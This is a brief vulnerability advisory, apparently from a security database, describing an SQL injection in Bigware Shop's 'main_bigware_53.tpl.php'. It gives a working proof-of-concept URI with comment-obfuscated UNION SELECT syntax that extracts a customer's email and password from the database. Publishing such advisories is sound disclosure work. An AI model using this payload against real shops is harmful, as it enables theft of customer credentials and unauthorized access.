Bigware Shop 'main_bigware_53.tpl.php' SQL Injection Vulnerability

info
discussion
exploit
solution
references

Bigware Shop 'main_bigware_53.tpl.php' SQL Injection Vulnerability

An attacker can exploit this issue via a browser.

The following proof-of-concept URI is available:

http://www.example.com/main_bigware_53.php?op=results&pollid=-1/**/and/**/voteid=0/**/and/**/language_id=5/**/and/**/1=1/**/UnIOn/**/SeLeCt/**/ConCat(former_email_address,0x3a,former_password)/**/FrOM/**/former/**/WhEre/**/former_id=1/*